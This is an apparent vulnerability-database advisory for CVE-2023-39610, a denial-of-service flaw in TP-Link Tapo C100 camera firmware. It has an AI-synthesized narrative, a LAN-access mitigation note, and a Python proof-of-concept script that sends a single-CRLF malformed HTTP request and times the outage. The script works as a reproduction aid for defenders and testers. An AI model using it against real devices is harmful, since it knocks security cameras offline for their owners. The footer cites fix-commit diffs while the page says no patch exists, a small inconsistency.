VYPR
Unrated severity · NVD Advisory · Published Oct 31, 2023 · Updated Sep 12, 2024

CVE-2023-39610

Description

An issue in TP-Link Tapo C100 v1.1.15 Build 211130 Rel.15378n(4555) and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted web request.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

  • TP-Link Tapo C100 (no CPE assigned): versions <= v1.1.15 Build 211130 Rel.15378n(4555)

Patches

None listed; see "What the fix does" below.

Vulnerability mechanics

Root cause

"The HTTP service's request parsing logic mishandles a single CRLF sequence, causing the service to become unresponsive."

Attack vector

An attacker on the same local network as the Tapo C100 sends a crafted HTTP GET request containing a single CRLF (Carriage Return Line Feed) in the headers [ref_id=1]. This malformed request causes the HTTP service on the device to become inaccessible for a period that scales with the number of requests sent (e.g., one request yields ~2 minutes of unavailability, ten requests yield ~10 minutes) [ref_id=1]. The attack requires no authentication and no user interaction, and the CVSS vector is AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H [ref_id=1].

Affected code

The advisory does not specify a particular function or file path. The vulnerability resides in the HTTP service of the TP-Link Tapo C100 firmware version v1.1.15 Build 211130 Rel.15378n(4555) and earlier [ref_id=1]. The flaw is in the request-handling or parsing logic of the HTTP server [ref_id=1].

What the fix does

No patch or fix has been published by TP-Link for this vulnerability [ref_id=1]. The advisory directs users to TP-Link's security advisory page for future updates but does not include remediation guidance or a fixed firmware version [ref_id=1]. With no vendor fix available, the attack vector itself (AV:A, adjacent network) is the only lever a defender has: a host that cannot reach the camera's HTTP service on the local network cannot trigger the condition, so restricting which LAN hosts can connect to the device limits exposure until a fixed firmware ships.

Preconditions

  • network: attacker must be on the same local network (adjacent) as the TP-Link Tapo C100 device
  • auth: no authentication required
  • input: no user interaction required

Reproduction

Send a crafted HTTP GET request containing a single CRLF in the headers to the Tapo C100's IP address. For example, a request with exactly one CRLF sequence causes the HTTP service to become unresponsive for approximately 2 minutes. Sending multiple such requests increases the downtime proportionally (e.g., 10 requests cause ~10 minutes of unavailability) [ref_id=1].
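The following Python script is an added example, not code from the advisory or from TP-Link, and it serves both the attack-vector description above and this reproduction section. The advisory publishes only the shape of the trigger ("exactly one CRLF sequence"), not the exact bytes, so the malformed request here is an assumption: the request line terminated by a single CRLF with no header-block terminator (CRLF CRLF). The target address is a placeholder. The script builds the well-formed and malformed requests side by side, exposes the check a proxy or IDS would apply to tell them apart, and, against a real device, sends the malformed request and then polls a well-formed probe to time the outage the advisory describes (~2 minutes per request), with a hard ceiling so the measurement itself never hangs.

```python
import socket
import time

# Placeholder LAN address of the camera (assumption; substitute the real one).
TARGET_HOST = "192.168.0.10"
TARGET_PORT = 80
CRLF = b"\r\n"


def build_request(path: str = "/", host: str = TARGET_HOST) -> bytes:
    """Well-formed HTTP/1.1 GET: request line, Host header, then the empty
    line (CRLF CRLF) that terminates the header block."""
    return (
        f"GET {path} HTTP/1.1".encode() + CRLF
        + f"Host: {host}".encode() + CRLF
        + CRLF
    )


def build_single_crlf_request(path: str = "/") -> bytes:
    """Request containing exactly one CRLF: the request line is terminated but
    the header block never is. This byte layout is an assumption about what the
    advisory calls a 'single CRLF'; the exact trigger bytes are not published."""
    return f"GET {path} HTTP/1.1".encode() + CRLF


def header_block_complete(raw: bytes) -> bool:
    """True when the header block carries its CRLF CRLF terminator. A server
    parser that neither rejects nor times out a request lacking it can stall,
    which is the failure mode the advisory attributes to this device."""
    return CRLF + CRLF in raw


def count_crlf(raw: bytes) -> int:
    """Number of CRLF sequences in a raw request (1 for the malformed variant)."""
    return raw.count(CRLF)


def service_responds(host: str, port: int, timeout: float = 2.0) -> bool:
    """Liveness probe: connect, send a well-formed GET, expect a status line."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(build_request("/", host))
            return s.recv(64).startswith(b"HTTP/")
    except OSError:
        return False


def send_raw(host: str, port: int, payload: bytes, timeout: float = 2.0) -> None:
    """Deliver raw bytes and close; no reply is expected from a stalled service."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


def measure_outage(host: str, port: int, n_requests: int = 1,
                   poll: float = 5.0, max_wait: float = 900.0) -> float:
    """Send n_requests malformed requests, then poll until the HTTP service
    answers a well-formed probe again. Returns seconds until recovery, or
    max_wait if it never recovered within the ceiling."""
    for _ in range(n_requests):
        try:
            send_raw(host, port, build_single_crlf_request())
        except OSError:
            break  # already unresponsive; no point sending more
    start = time.monotonic()
    while time.monotonic() - start < max_wait:
        if service_responds(host, port):
            return time.monotonic() - start
        time.sleep(poll)
    return max_wait


if __name__ == "__main__":
    print(f"baseline reachable: {service_responds(TARGET_HOST, TARGET_PORT)}")
    print(f"outage after 1 request: {measure_outage(TARGET_HOST, TARGET_PORT, 1):.0f}s")
```

Run it once with n_requests=1 and once with n_requests=10 to check the advisory's claim that downtime scales roughly linearly; the probe deliberately uses a short connect timeout so an unresponsive device registers as down rather than blocking the poll loop.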

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
